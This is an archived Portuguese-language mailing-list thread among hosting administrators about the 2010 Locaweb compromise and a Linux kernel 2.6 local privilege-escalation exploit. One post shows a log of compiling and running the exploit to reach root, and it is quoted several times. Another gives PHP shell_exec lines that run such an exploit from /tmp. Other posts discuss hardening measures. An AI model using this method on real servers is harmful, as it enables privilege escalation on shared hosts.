seguro, independente >> de prover o acesso SSH aos clientes ou n?o. >> >> Essa historia se resume em amadorismo. >> >> 2010/9/18 Roberto Bert? >> >>> Ola Guilherme, >>> >>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >> Pode >>> ter sido outra coisa, mas duvido muito. >>> >>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa >>> no pessoal que escreveu o codigo do kernel, podemos por a culpa na >>> redhat >> por >>> nao ter auditado, podemos por a culpa nos pesquisadores que >>> descobriram a falha, ou nos que divulgaram a falha na internet junto >>> com o exploit, ou at? mesmo nos legisladores do mundo todo por nao >>> termos leis que criem um metodo seguro de divulgar falhas de >>> seguranca primeiro para as empresas que >> podem >>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>> >>> Nao ? bug de chroot de ftp. >>> >>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem >>> a execucao de comados, porque tem php, perl, etc. Entao bastava >>> subir um binario compilado e executar ele e voce virava root. Eu >>> reproduzi isso >> num >>> ambiente de testes. >>> >>> >>> >>> 2010/9/18 Guilherme Boing >>> >>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >> que >>>> foi publicado com o acontecido na Locaweb ? >>>> >>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? >>>> de quem, dos usu?rios ? >>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>> sistema >>> for >>>> bem protegido e bem administrado. >>>> >>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>> executado >>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>> >>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >> privil?gios >>>> do >>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >> pelo >>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>> atualizado como bem protegido. >>>> >>>> 2010/9/18 Roberto Bert? >>>> >>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >> segunda >>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-cu >> lpa/ >>>>> < >>>>> >> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-cu >> lpa/> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l From marcelo at tpn.com.br Mon Sep 20 12:03:33 2010 From: marcelo at tpn.com.br (Marcelo Coelho) Date: Mon, 20 Sep 2010 12:03:33 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C966199.9050006@onda.psi.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> Message-ID: <33791DBE-E666-4031-B6FB-E523FB347745@tpn.com.br> Alexandre, Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: - o invasor pode compilar o exploit remotamente e enviar para o servidor. - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas com scripts perl e php. On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: > Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, n?o ? "justo" (digamos assim). > > A falha da locaweb ? comum em v?rias empresas de hosting: > > - deixar os compiladores acessiveis aos usuarios. > - alguns binarios como wget, nc, etc ficam disponiveis para execucao de qualquer usuario.. > - permitir a execucao de scripts. > - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) > > consegui o exploit e fiz testes em varios servidores.. > > [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z > [alexandre at xxx aaa]$ ./Ac1dB1tch3z > Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y > $$$ Kallsyms +r > $$$ K3rn3l r3l3as3: > $$$ prepare_creds->ffffffff8024b626 > $$$ override_creds->ffffffff8024b755 > $$$ revert_creds->ffffffff8024bbf4 > $$$ Kernel Credentials detected > ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d > $$$ timer_list_fops->ffffffff806bbb80 > $$$ w34p0n 0f ch01c3: F0PZzZzzz > $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d > $$$ Prepare: m0rn1ng w0rk0ut b1tch3z > $$$ Us1ng cr3d s3ash3llc0d3z > $$$ 0p3n1ng th3 m4giq p0rt4l > $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c > $$$ 0v3r thr0w f0ps g0v3rnm3nt > $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP > sh-3.2# whoami; id > root > uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) > > > a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc compilar o exploit em 32bits.. > > em um lik ja publicado aqui, (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum software que seja 32bits.. o melhor eh desativar definitivamente a compatibilidade !! > > :) > > > > Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >> locaweb foi comprometido, em quest?o de horas os servi?os foram normalizados >> e isso sim ? bom. >> >> Procure por dom?nios de grandes provedores aqui: >> http://www.zone-h.com/archive >> >> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >> apenas de ataques que se tornaram p?blicos...). >> >> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >> deve acontecer, elevando ainda mais a sua maturidade. >> >> []s >> >> Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: >> >>> Roberto, >>> >>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, >>> ? >>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>> 'defaceados'. >>> >>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es >>> e >>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>> de >>> kernel. >>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, >>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>> >>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso >>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>> servidores, para depois sim, tomar um passo deste. >>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>> prover o acesso SSH aos clientes ou n?o. >>> >>> Essa historia se resume em amadorismo. >>> >>> 2010/9/18 Roberto Bert? >>> >>>> Ola Guilherme, >>>> >>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>> Pode >>>> ter sido outra coisa, mas duvido muito. >>>> >>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>> por >>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a >>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, ou >>>> at? >>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>> metodo >>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>> podem >>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>> >>>> Nao ? bug de chroot de ftp. >>>> >>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>> num >>>> ambiente de testes. >>>> >>>> >>>> >>>> 2010/9/18 Guilherme Boing >>>> >>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>> que >>>>> foi publicado com o acontecido na Locaweb ? >>>>> >>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>> quem, >>>>> dos usu?rios ? >>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema >>>> for >>>>> bem protegido e bem administrado. >>>>> >>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>> executado >>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>> >>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>> privil?gios >>>>> do >>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>> pelo >>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>> atualizado como bem protegido. >>>>> >>>>> 2010/9/18 Roberto Bert? >>>>> >>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>> segunda >>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>> >>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>> < >>>>>> >>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> > > > -- > Sds. > > Alexandre Jeronimo Correa > S?cio-Administrador > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From alexandre at onda.psi.br Mon Sep 20 12:05:45 2010 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Mon, 20 Sep 2010 12:05:45 -0300 Subject: [MASOCH-L] RES: RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> Message-ID: <4C977849.2030901@onda.psi.br> talvez o atacante n?o usou ssh, simplesmente um script php com o shell_exec("gcc -m32 /tmp/arquivo.c -o /tmp/arquivo"); shell_exec("/tmp/arquivo; whoami;"); ja resolvia o problema.. Em 20/09/2010 11:38, Cleber @ Listas escreveu: > Alexandre, > Concordo contigo. Essa falha do exploit todos que utilizam 64bits e o modo > de compatibilidade com o mesmo Kernel e permitem SSH remoto para o usu?rio, > est?o vulner?veis. Infelizmente, o caso tomou essa propor??o pelo simples > motivo deles terem muitos clientes nos ambientes compartilhados. > Sinceramente, para nossos clientes n?o permitidos acesso SSH, tentamos dar o > maximo de ferramentas para o cliente faz?-lo via painel de controle. > > -----Mensagem original----- > De: masoch-l-bounces at eng.registro.br > [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alexandre J. Correa - > Onda Internet > Enviada em: domingo, 19 de setembro de 2010 16:17 > Para: Mail Aid and Succor, On-line Comfort and Help > Assunto: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, > n?o ? "justo" (digamos assim). > > A falha da locaweb ? comum em v?rias empresas de hosting: > > - deixar os compiladores acessiveis aos usuarios. > - alguns binarios como wget, nc, etc ficam disponiveis para execucao de > qualquer usuario.. > - permitir a execucao de scripts. > - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) > > consegui o exploit e fiz testes em varios servidores.. > > [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z [alexandre at xxx > aaa]$ ./Ac1dB1tch3z Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y $$$ Kallsyms > +r $$$ K3rn3l r3l3as3: > $$$ prepare_creds->ffffffff8024b626 > $$$ override_creds->ffffffff8024b755 > $$$ revert_creds->ffffffff8024bbf4 > $$$ Kernel Credentials detected > ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d $$$ > timer_list_fops->ffffffff806bbb80 $$$ w34p0n 0f ch01c3: F0PZzZzzz $$$ > Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d $$$ Prepare: > m0rn1ng w0rk0ut b1tch3z $$$ Us1ng cr3d s3ash3llc0d3z $$$ 0p3n1ng th3 m4giq > p0rt4l $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c $$$ 0v3r thr0w f0ps g0v3rnm3nt > $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP sh-3.2# whoami; id root > uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) > > > a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc > compilar o exploit em 32bits.. > > em um lik ja publicado aqui, > (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) > tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum > software que seja 32bits.. o melhor eh desativar definitivamente a > compatibilidade !! > > :) > > > > Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >> locaweb foi comprometido, em quest?o de horas os servi?os foram >> normalizados e isso sim ? bom. >> >> Procure por dom?nios de grandes provedores aqui: >> http://www.zone-h.com/archive >> >> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer >> um pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos >> falando apenas de ataques que se tornaram p?blicos...). >> >> O importante ? que eles busquem aprender com o ocorrido, e com certeza >> isso deve acontecer, elevando ainda mais a sua maturidade. >> >> []s >> >> Em 18 de setembro de 2010 17:57, Guilherme > Boingescreveu: >>> Roberto, >>> >>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >>> houve, ? da Locaweb, que ? a respons?vel pela hospedagem desses sites >>> que foram 'defaceados'. >>> >>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha >>> da pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >>> corre??es e m?todos de seguran?a que inibiriam qualquer tipo de >>> exploit local a n?vel de kernel. >>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >>> algum, se tratando de plataforma web. Muito menos, garantir acesso SSH. >>> >>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >>> acesso SSH aos clientes, deveria prezar primeiramente pela seguran?a >>> dos servidores, para depois sim, tomar um passo deste. >>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente >>> de prover o acesso SSH aos clientes ou n?o. >>> >>> Essa historia se resume em amadorismo. >>> >>> 2010/9/18 Roberto Bert? >>> >>>> Ola Guilherme, >>>> >>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>> Pode >>>> ter sido outra coisa, mas duvido muito. >>>> >>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa >>>> no pessoal que escreveu o codigo do kernel, podemos por a culpa na >>>> redhat >>> por >>>> nao ter auditado, podemos por a culpa nos pesquisadores que >>>> descobriram a falha, ou nos que divulgaram a falha na internet junto >>>> com o exploit, ou at? mesmo nos legisladores do mundo todo por nao >>>> termos leis que criem um metodo seguro de divulgar falhas de >>>> seguranca primeiro para as empresas que >>> podem >>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>> >>>> Nao ? bug de chroot de ftp. >>>> >>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem >>>> a execucao de comados, porque tem php, perl, etc. Entao bastava >>>> subir um binario compilado e executar ele e voce virava root. Eu >>>> reproduzi isso >>> num >>>> ambiente de testes. >>>> >>>> >>>> >>>> 2010/9/18 Guilherme Boing >>>> >>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>> que >>>>> foi publicado com o acontecido na Locaweb ? >>>>> >>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? >>>>> de quem, dos usu?rios ? >>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>>> sistema >>>> for >>>>> bem protegido e bem administrado. >>>>> >>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>> executado >>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>> >>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>> privil?gios >>>>> do >>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>> pelo >>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>> atualizado como bem protegido. >>>>> >>>>> 2010/9/18 Roberto Bert? >>>>> >>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>> segunda >>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>> >>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-cu >>> lpa/ >>>>>> < >>>>>> >>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-cu >>> lpa/> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> > > -- > Sds. > > Alexandre Jeronimo Correa > S?cio-Administrador > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From marcelo at tpn.com.br Mon Sep 20 12:06:11 2010 From: marcelo at tpn.com.br (Marcelo Coelho) Date: Mon, 20 Sep 2010 12:06:11 -0300 Subject: [MASOCH-L] RES: RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> <001601cb58d1$7e6812b0$7b383810$@inetweb.com.br> Message-ID: Curiosidade: alguma outra empresa sofreu algum ataque? Pergunto isso porque, para uma falha cr?tica de seguran?a, mais empresas devem estar vulner?veis. On Sep 20, 2010, at 11:38 AM, Cleber @ Listas wrote: > Alexandre, > Concordo contigo. Essa falha do exploit todos que utilizam 64bits e o modo > de compatibilidade com o mesmo Kernel e permitem SSH remoto para o usu?rio, > est?o vulner?veis. Infelizmente, o caso tomou essa propor??o pelo simples > motivo deles terem muitos clientes nos ambientes compartilhados. > Sinceramente, para nossos clientes n?o permitidos acesso SSH, tentamos dar o > maximo de ferramentas para o cliente faz?-lo via painel de controle. > From alexandre at onda.psi.br Mon Sep 20 12:07:16 2010 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Mon, 20 Sep 2010 12:07:16 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <33791DBE-E666-4031-B6FB-E523FB347745@tpn.com.br> References: <4C942A44.50104@gmail.com> <4C9438CB.3070405@yahoo.com.br> <4C966199.9050006@onda.psi.br> <33791DBE-E666-4031-B6FB-E523FB347745@tpn.com.br> Message-ID: <4C9778A4.1050407@onda.psi.br> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja dificulta.. manter o /tmp e outras pastas de escrita "publica" com permissoes de noexec no "mount" ... Em 20/09/2010 12:03, Marcelo Coelho escreveu: > Alexandre, > > Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: > > - o invasor pode compilar o exploit remotamente e enviar para o servidor. > - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas com scripts perl e php. > > > > On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: > >> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, n?o ? "justo" (digamos assim). >> >> A falha da locaweb ? comum em v?rias empresas de hosting: >> >> - deixar os compiladores acessiveis aos usuarios. >> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de qualquer usuario.. >> - permitir a execucao de scripts. >> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >> >> consegui o exploit e fiz testes em varios servidores.. >> >> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >> $$$ Kallsyms +r >> $$$ K3rn3l r3l3as3: >> $$$ prepare_creds->ffffffff8024b626 >> $$$ override_creds->ffffffff8024b755 >> $$$ revert_creds->ffffffff8024bbf4 >> $$$ Kernel Credentials detected >> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >> $$$ timer_list_fops->ffffffff806bbb80 >> $$$ w34p0n 0f ch01c3: F0PZzZzzz >> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >> $$$ Us1ng cr3d s3ash3llc0d3z >> $$$ 0p3n1ng th3 m4giq p0rt4l >> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >> $$$ 0v3r thr0w f0ps g0v3rnm3nt >> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >> sh-3.2# whoami; id >> root >> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >> >> >> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc compilar o exploit em 32bits.. >> >> em um lik ja publicado aqui, (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum software que seja 32bits.. o melhor eh desativar definitivamente a compatibilidade !! >> >> :) >> >> >> >> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>> locaweb foi comprometido, em quest?o de horas os servi?os foram normalizados >>> e isso sim ? bom. >>> >>> Procure por dom?nios de grandes provedores aqui: >>> http://www.zone-h.com/archive >>> >>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>> apenas de ataques que se tornaram p?blicos...). >>> >>> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >>> deve acontecer, elevando ainda mais a sua maturidade. >>> >>> []s >>> >>> Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: >>> >>>> Roberto, >>>> >>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, >>>> ? >>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>> 'defaceados'. >>>> >>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es >>>> e >>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>>> de >>>> kernel. >>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, >>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>> >>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso >>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>> servidores, para depois sim, tomar um passo deste. >>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>> prover o acesso SSH aos clientes ou n?o. >>>> >>>> Essa historia se resume em amadorismo. >>>> >>>> 2010/9/18 Roberto Bert? >>>> >>>>> Ola Guilherme, >>>>> >>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>> Pode >>>>> ter sido outra coisa, mas duvido muito. >>>>> >>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>> por >>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a >>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, ou >>>>> at? >>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>> metodo >>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>> podem >>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>> >>>>> Nao ? bug de chroot de ftp. >>>>> >>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>> num >>>>> ambiente de testes. >>>>> >>>>> >>>>> >>>>> 2010/9/18 Guilherme Boing >>>>> >>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>> que >>>>>> foi publicado com o acontecido na Locaweb ? >>>>>> >>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>> quem, >>>>>> dos usu?rios ? >>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema >>>>> for >>>>>> bem protegido e bem administrado. >>>>>> >>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>> executado >>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>> >>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>> privil?gios >>>>>> do >>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>> pelo >>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>> atualizado como bem protegido. >>>>>> >>>>>> 2010/9/18 Roberto Bert? >>>>>> >>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>> segunda >>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>> >>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>>> < >>>>>>> >>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> >> >> -- >> Sds. >> >> Alexandre Jeronimo Correa >> S?cio-Administrador >> >> Onda Internet >> www.onda.net.br >> >> IPV6 Ready ! >> www.ipv6.onda.net.br >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From algorges at gmail.com Mon Sep 20 13:20:46 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 20 Sep 2010 13:20:46 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C9778A4.1050407@onda.psi.br> Message-ID: Chmod 700 /usr/bin/gcc apenas root pode usar. []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: "Alexandre J. Correa - Onda Internet" > Organization: Onda Internet Ltda. > Reply-To: Lista Masoch > Date: Mon, 20 Sep 2010 12:07:16 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > mas se o php for bloqueado (extensoes/funoces de execu??o).. ja > dificulta.. > > manter o /tmp e outras pastas de escrita "publica" com permissoes de > noexec no "mount" ... > > > Em 20/09/2010 12:03, Marcelo Coelho escreveu: >> Alexandre, >> >> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: >> >> - o invasor pode compilar o exploit remotamente e enviar para o servidor. >> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas com >> scripts perl e php. >> >> >> >> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >> >>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, >>> n?o ? "justo" (digamos assim). >>> >>> A falha da locaweb ? comum em v?rias empresas de hosting: >>> >>> - deixar os compiladores acessiveis aos usuarios. >>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>> qualquer usuario.. >>> - permitir a execucao de scripts. >>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>> >>> consegui o exploit e fiz testes em varios servidores.. >>> >>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>> $$$ Kallsyms +r >>> $$$ K3rn3l r3l3as3: >>> $$$ prepare_creds->ffffffff8024b626 >>> $$$ override_creds->ffffffff8024b755 >>> $$$ revert_creds->ffffffff8024bbf4 >>> $$$ Kernel Credentials detected >>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>> $$$ timer_list_fops->ffffffff806bbb80 >>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>> $$$ Us1ng cr3d s3ash3llc0d3z >>> $$$ 0p3n1ng th3 m4giq p0rt4l >>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>> $$$ 